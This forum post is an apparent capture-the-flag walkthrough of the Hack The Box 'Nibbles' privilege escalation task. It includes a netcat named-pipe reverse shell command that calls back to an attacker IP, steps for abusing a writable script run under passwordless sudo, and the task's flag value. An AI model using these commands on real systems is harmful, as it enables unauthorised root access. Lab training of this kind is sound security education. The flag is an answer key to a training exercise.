Getting Started / Nibbles - Privilege Escalation

Off-topic
, ,
1

:warning: Before solving a current challenge, I recommend that you complete the previous section: https://academy.hackthebox.com/module/77/section/852
# This will allow you to perform a reverse shell connection

• We already have some necessary information from the Nibbles - Initial Foothold: credentials, uploaded shell.sh script to get access to user (nibbler) directories.
• We can also use python3 -c 'import pty; pty.spawn("/bin/bash")', which works to get us to a friendlier shell.

If not subscribed, some tasks can be performed using a virtual machine. :white_check_mark:

TASK DESCRIPTION:
• Escalate privileges and submit the root.txt flag.

:warning: Your start directory must be a /home/nibbler

STEPS TO EXECUTION: :fire:

  1. As mentioned in section - we unzip the personal.zip file and see a file called monitor.sh.

    new directories are open
    new directories are open886×320 26.4 KB

  2. As mentioned in the screenshot above, we access the monitor.sh file. The shell script monitor.sh is a monitoring script, and it is owned by our nibbler user and writeable.
    Run nibbler@Nibbles:/home/nibbler$ cat personal/stuff/monitor.sh to explore the contents of a file.

  3. Now we can add the necessary line of code to monitor.sh to get root privileges. Let’s run the following command: nibbler@Nibbles:/home/nibbler$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.49 8443 >/tmp/f' | tee -a personal/stuff/monitor.sh. As a result a the monitor.sh file has got a new line of code:

    VM / Pseudo-Terminal
    VM / Pseudo-Terminal1862×356 29.6 KB

• 10.10.15.49 - VPN IP (use your current)
• 8443 - new listen port to run a reverse shell with root privileges

  1. In a new local terminal, let’s run the command: nc -nv lvnp 8443.

  2. In a target reverse shell, don’t forget to check a sudo -l info:

    1410×188 17.5 KB

    Good news, we can use sudo without a password to run our script.

  3. Run a command: sudo /home/nibbler/personal/stuff/monitor.sh.

Use full path, otherwise system will prompt you for password :warning:

  1. In the new local terminal, where we ran a nc -nv lvnp 8443, we have access to the root reverce shell:

    1410×206 23.6 KB

  2. Run whoami - root

  3. Run pwd - /home/nibbler

  4. Run cd /root & ls - root.txt / finally cat root.txt

RESULT: de5e5d6619862a8aa5b9b212314e0cdd :eyes:

:gem: Don’t use a spoiler, do it all on your own and do it better one more time.

1 Like
2

Thanks a lot. I did every step correct except for this. I was stuck for hours trying to start a reverse shell by running the monitor.sh